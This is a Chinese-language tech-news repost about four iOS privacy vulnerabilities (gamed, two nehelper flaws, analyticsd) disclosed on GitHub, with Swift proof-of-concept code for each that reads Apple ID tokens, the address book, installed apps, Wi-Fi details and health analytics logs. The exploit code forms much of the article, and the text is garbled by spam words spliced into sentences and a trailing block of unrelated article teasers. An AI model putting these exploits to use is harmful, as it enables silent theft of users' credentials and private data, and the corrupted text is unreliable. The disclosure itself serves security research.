研究人员发现三个iOS 0 day漏洞PoC代码
[[425782]]
研究人员发现3个iOS 0 day漏洞PoC代码。研究

GitHub用户illusionofchaos在GitHub上发布了4个iOS 安全漏洞的发现PoC代码,其中包含3个0 day漏洞和1个已修复的洞P代码安全漏洞。这4个漏洞分别是研究:
Gamed 0-day Nehelper Enumerate Installed Apps 0-day Nehelper Wifi Info 0-day Analyticsd (iOS 14.7中已修复)Gamed 0-day
从APP store中按住那个的应用可以在用户不知情的情况下访问以下信息:
Apple ID邮箱和Apple ID账户的全名; Apple ID认证token,允许以用户名义访问*.apple.com上的发现至少1个终端; Core Duet数据库的完全文件系统读权限,其中包含邮箱、洞P代码SMS、研究iMessage和第3方消息APP的发现联系人,以及与这些联系人进行用户交互的洞P代码元数据; 快速拨号数据库和地址簿数据库的完全文件系统读权限,亿华云包括联系人图片和其他元数据;PoC代码如下:
复制let connection = NSXPCConnection(machServiceName: "com.apple.gamed",研究 options: NSXPCConnection.Options.privileged)! let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol let pid = ProcessInfo.processInfo.processIdentifier proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in let appleID = response.credential.accountName let token = response.credential.authenticationToken } utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in let addressBookData = data } } 1.2.3.4.5.6.7.8.9.10.11.12.Nehelper Enumerate Installed Apps 0-day
该漏洞允许任何用户安装的APP来确定设备上安装的APP是否是给定的bundle ID。XPC终端com.apple.nehelper 有一个访问APP的发现方法可以接受bundle ID作为参数,并返回含有缓存UUID的洞P代码数组,缓存的研究UUID可以用来与设备上安装的应用的bundle ID进行配对。具体参见/usr/libexec/nehelper的发现[NEHelperCacheManager onQueueHandleMessage:] :
复制func isAppInstalled(bundleId: String) -> Bool { let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)! xpc_connection_set_event_handler(connection, { _ in }) xpc_connection_resume(connection) let xdict = xpc_dictionary_create(nil, nil, 0) xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1) xpc_dictionary_set_uint64(xdict, "cache-command", 3) xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId) let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil { return true } return false } 1.2.3.4.5.6.7.8.9.10.11.12.13.14.Nehelper Wifi Info 0-day
XPC终端com.apple.nehelper会接收用户提供的参数sdk-version,如果该值小于后等于524288,洞P代码com.apple.developer.networking.wifi-info entiltlement就会跳过。服务器托管这使得任何符合条件的APP都可以在无需entiltlement的情况下获取WiFi信息。
复制func wifi_info() -> String? { let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2) xpc_connection_set_event_handler(connection, { _ in }) xpc_connection_resume(connection) let xdict = xpc_dictionary_create(nil, nil, 0) xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10) xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely xpc_dictionary_set_string(xdict, "interface-name", "en0") let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) if let result = xpc_dictionary_get_value(reply, "result-data") { let ssid = String(cString: xpc_dictionary_get_string(result, "SSID")) let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID")) return "SSID: (ssid)nBSSID: (bssid)" } else { return nil } } 1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.Analyticsd (iOS 14.7中已修复)
该漏洞允许任意用户安装的APP访问分析日志。这些日志中含有以下信息:
医疗信息,包括心跳、异常心律事件等; 设备使用信息,包括推送通知数和用户的行为等; 屏幕时间信息和给定bundle ID的所有有用的会话数; Safari中用户查看的web页面的语言; 设备配件的信息,包括厂商、型号、固件版本和用户分配的名字; 复制func analytics_json() -> String? { let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2) xpc_connection_set_event_handler(connection, { _ in }) xpc_connection_resume(connection) let xdict = xpc_dictionary_create(nil, nil, 0) xpc_dictionary_set_string(xdict, "command", "log-dump"); let reply = xpc_connection_send_message_with_reply_sync(connection, xdict); return xpc_dictionary_get_string(reply, "log-dump"); } 1.2.3.4.5.6.7.8.9.更多参见:https://habr.com/ru/post/579714/
云服务器相关文章
- Ubuntu的root默认是禁止使用的,在安装的时候也没要求你设置root的密码,和红帽系统系列这里是不同的。要在Ubuntu下使用root,我们可以使用终端给root设置密码 sudo passwd2025-11-05
探寻语义错误韩剧电脑壁纸高清的魅力(深入解析语义错误韩剧电脑壁纸高清的视觉冲击力)
摘要:在电脑壁纸中,我们经常能看到一些与现实情节不符的语义错误韩剧场景,但其高清画质依然引人入胜。本文将从视觉冲击力的角度,深入探讨这些语义错误韩剧电脑壁纸的魅力。1.炽烈的情感...2025-11-05以美妆PPT制作教程电脑为主题(打造精美妆容PPT,让你成为妆容达人)
摘要:在现代社会,美妆已经成为了很多人日常生活中不可或缺的一部分。而制作一份精美的美妆PPT,不仅可以帮助我们展示自己的妆容技巧,还能够吸引更多人的关注和学习。本文将以电脑为主题,为大家...2025-11-05华硕刻刻录机CD的优势和性能分析(探索华硕刻刻录机CD的功能特点及用户评价)
摘要:随着数码时代的到来,光盘仍然扮演着重要的角色。华硕作为知名数码产品制造商,其刻刻录机CD备受用户青睐。本文将深入分析华硕刻刻录机CD的优势和性能,以及探讨用户的评价,帮助读者更好地...2025-11-05打造自己的移动电脑支架——DIY教程(轻松搭建便携式电脑工作站,提升工作效率)
摘要:在现代快节奏的工作和生活中,我们经常需要在不同的地方使用电脑,而一个移动的电脑支架可以帮助我们提高工作效率。本文将为您详细介绍如何自制一个便携式的电脑支架,让您的工作站无处不在。...2025-11-05- 摘要:在当今信息化时代,电脑已成为人们工作生活中不可或缺的工具,掌握电脑办公技能对于提高工作效率、提升职场竞争力至关重要。本文将为大家介绍一份以电脑办公实用培训教程为主题的文章,详细阐述...2025-11-05

最新评论